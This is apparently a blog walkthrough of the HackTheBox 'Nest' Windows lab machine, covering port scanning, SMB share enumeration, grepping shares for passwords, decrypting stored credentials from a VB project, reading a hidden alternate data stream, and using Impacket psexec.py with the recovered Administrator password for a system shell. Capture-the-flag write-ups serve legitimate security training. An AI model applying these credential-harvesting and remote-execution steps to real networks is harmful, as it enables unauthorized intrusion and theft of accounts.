Nest

Don’t get too comfortable!

HackTheBox Nest Machine Info Card

Nest is an easy difficulty machine running Windows. It tests your knowledge of basic enumeration and code analysis to gain access to user and root.

Be sure to check out the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan nest.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 07:21 PST
Nmap scan report for nest.htb (10.10.10.178)
Host is up (0.22s latency).

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown

Host script results:
|_clock-skew: -7m37s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-26T15:17:05
|_  start_date: 2020-01-26T15:09:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 207.33 seconds

The Unknown Port

When we get an unknown port, it scratches the part of our brain that makes us wonder what is behind that mysterious black hole. Let’s check it out with netcat, remembering that it is a Windows machine so we will use the CRLF flag!

Connecting with netcat we find a prompt:

nc -C nest.htb 4386
HQK Reporting Service V1.2
> help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Typing in help we see a list of commands. We don’t seem to be able to do much so we can assume we need the DEBUG password. Trying a bunch of default passwords returns no results. Let’s continue on and keep an eye out for some passwords.

Samba

Taking a look at port 445 with smbclient we find the following shares:

smbclient -L //10.10.10.178 -U " "%" "
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      

None of them appear to be writable when we check them with our smb-check.sh script:

./smb-check.sh
Checking root of share 'ADMIN$'
No, NEST\guest has no access
Checking root of share 'C$'
No, NEST\guest has no access
Checking root of share 'Data'
No, NEST\guest has no access
Checking root of share 'Secure$'
No, NEST\guest has no access
Checking root of share 'Users'
No, NEST\guest has no access

Navigating through the SMB shares we come across something interesting: in //10.10.10.178/Data/Shared/Templates/Marketing there is a file called Welcome Email.txt that contains the following:

We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: we....19


Thank you
HR

Using the credentials we have found, let’s start by mounting the shares so we can search them more easily.

Let’s start with Data since this is where we found the credentials in the first place:

mount -t cifs -o username=TempUser //10.10.10.178/Data /root/Documents/nest/Shares/Data

And then we will search for usernames and passwords:

grep -ir "username\|password" .
./IT/Configs/RU Scanner/RU_config.xml:  <Username>c.smith</Username>
./IT/Configs/RU Scanner/RU_config.xml:  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
./Shared/Templates/HR/Welcome Email.txt:\\HTB-NEST\Users\<USERNAME>
./Shared/Templates/HR/Welcome Email.txt:Username: TempUser
./Shared/Templates/HR/Welcome Email.txt:Password: welcome2019

Looks like we have found some more creds, although the password looks like a hash. On closer inspection the string doesn’t match any known hash format:

hashid fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
Analyzing 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE='
[+] Unknown hash

We have some more searching to do to find any hints as to how this password string is encoded.

User

Searching through the files in the shares we have access to, we find a file called config.xml in Data/IT/Configs/NotepadPlusPlus. Within it we find <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />.

Listing the Carl directory we find that we have access:

ls -l Secure\$/IT/Carl
total 0
drwxr-xr-x 2 root root 0 Aug  7  2019  Docs
drwxr-xr-x 2 root root 0 Aug  6  2019  Reports
drwxr-xr-x 2 root root 0 Aug  6  2019 'VB Projects'

Looking further we find a Visual Basic project folder:

ls -l Secure\$/IT/Carl/VB\ Projects/WIP
total 0
drwxr-xr-x 2 root root 0 Aug  9 08:36 RU

Loading the project in Visual Studio we can navigate to Utils.vb and set a breakpoint at line 114. Running the debugger we find the password xRxRx....xRxRx:

Visual Studio User Screenshot

Trying the password against the users we have found so far, we find that it lets us connect as the c.smith user over SMB.

Having a look in the C.Smith folder we find our user flag:

cat Users/C.Smith/user.txt
cf71b25404....05f426e987

Let’s move on to root.

Root

In the C.Smith folder we also find the HQK Reporting directory which we know is from the unknown port we enumerated earlier.

Since I want to work on my Win-foo we will move over to a Windows VM and mount the share.

Taking a look at the folder we find a directory and a couple of files:

PS Z:\C.Smith\HQK Reporting> ls
    Directory: Z:\C.Smith\HQK Reporting


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/08/2019   8:18 PM                AD Integration Module
-a----        9/08/2019   7:08 AM              0 Debug Mode Password.txt
-a----        9/08/2019   7:09 AM            249 HQK_Config_Backup.xml

Looks like we have potentially found our DEBUG password for the unknown port. We also find a config backup, and in the AD Integration Module directory an executable called HqkLdap.exe.

Executing HqkLdap.exe we get the following output:

PS Z:\C.Smith\HQK Reporting\AD Integration Module> .\HqkLdap.exe
Invalid number of command line arguments

We are most likely going to need to analyze this file but for now let’s look in to our DEBUG password!

Taking a look at the file we see that it seems empty. A bit of stego maybe? Let’s copy the file to a writable location so we can investigate further:

PS Z:\C.Smith\HQK Reporting> cp '.\Debug Mode Password.txt' C:\Users\user\Desktop\password.txt

Since we are in Windows and Nest is a Windows machine let’s take a stab in the dark and check for file streams.

Recently saw this used in a CTF so let’s give it a crack…

We can check for alternate data streams in Windows with PowerShell using the Get-Item cmdlet with the -Stream parameter, or from the Command Prompt with dir /R:

PS C:\Users\user\Desktop> Get-Item -Path * -Stream *
PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop\password.txt::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop
PSChildName   : password.txt::$DATA
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\user\Desktop\password.txt
Stream        : :$DATA
Length        : 0

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop\password.txt:Password
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop
PSChildName   : password.txt:Password
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\user\Desktop\password.txt
Stream        : Password
Length        : 15

Here we find the data stream Password and can view the contents with the cat command:

PS C:\Users\user\Desktop> cat .\password.txt:Password
WBQ....D8w
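As an added example (not part of the original write-up), the following PowerShell script generalises the check above: it walks a directory tree, lists every alternate data stream other than the default :$DATA stream, and previews the first line of each, which is how a hidden stream like the Password one would stand out during a review. The starting directory is an assumption.

```powershell
# Added example, not from the original write-up.
# Enumerate alternate data streams (ADS) below a directory and preview each one.
param(
    [string]$Root = "$env:USERPROFILE\Desktop"   # assumed starting point; change as needed
)

Get-ChildItem -Path $Root -File -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Get-Item -Stream * returns one object per stream; the primary stream is ':$DATA'
        Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
    } |
    Where-Object { $_.Stream -ne ':$DATA' } |
    ForEach-Object {
        # Read only the first line so large or binary streams stay cheap to inspect
        $firstLine = Get-Content -LiteralPath $_.FileName -Stream $_.Stream -TotalCount 1 -ErrorAction SilentlyContinue
        if ($null -eq $firstLine) { $firstLine = '' }
        [PSCustomObject]@{
            File    = $_.FileName
            Stream  = $_.Stream
            Length  = $_.Length
            Preview = $firstLine.Substring(0, [Math]::Min(40, $firstLine.Length))
        }
    } |
    Format-Table -AutoSize
```

Zone.Identifier streams on downloaded files are expected noise; an arbitrarily named stream such as Password is the kind of thing worth a closer look.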

There is our DEBUG password… hopefully! Let’s go check it out with good ol’ telnet:

PS C:\Users\user\Desktop> telnet 10.10.10.178 4386
HQK Reporting Service V1.2

>debug WBQ....D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

Nice! Checking options with the HELP command we find that we can navigate directories with the SETDIR command. Let’s change to the parent directory and see what we can find:

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

We recognise HQK_Config.xml as we have a backup of it in the HQK Reporting share directory. Viewing its contents and comparing it to the backup, we find the backup is missing the DebugPassword setting:

>showquery 3

<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <DebugPassword>WBQ....D8w</DebugPassword>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>

Let’s add that to our backup as we may need it later with HqkLdap.exe.

Looking into the LDAP directory we find our HqkLdap.exe and a .conf file that we haven’t seen before:

>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

Viewing the file we see another encrypted password:

>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Let’s add the username and password to our RU_Config.xml and see if we can decrypt it.

When attempting to decrypt we get a padding error! I think it’s about time we take a look at HqkLdap.exe and see what it does.

On inspection we see it does a few things, but what catches our eye is the encryption function call:

CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)

This looks familiar. It looks a lot like the inputs in the Decrypt function of DbPof.exe.

Let’s go see:

Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

Sure enough, in Utils.vb we see the Decrypt function being called with six inputs, the same number of inputs as the CR.RD function. Let’s swap in the inputs from HqkLdap.exe, run DbPof.exe again and stop at our breakpoint:

Visual Studio Root Screenshot

Sure enough we uncover the password XtH....nGX.

Now, using this password we can access the C$ share and grab the flag from there…

But I have missed an interactive shell throughout this machine so let’s finish off with one:

psexec.py NEST/Administrator:XtH....nGX@nest.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on nest.htb.....
[*] Found writable share ADMIN$
[*] Uploading file aWScCAlj.exe
[*] Opening SVCManager on nest.htb.....
[*] Creating service ykVj on nest.htb.....
[*] Starting service ykVj.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
6594c2eb08....b94b878c41

Conclusion

Nest was an interesting machine. It was quite a CTF’y machine, but I enjoyed it. Some people don’t like that, but I feel that it gets you thinking at least. I wouldn’t mind hearing what you thought about this box, so find me on the various social media platforms and hit me up!

Hack The Box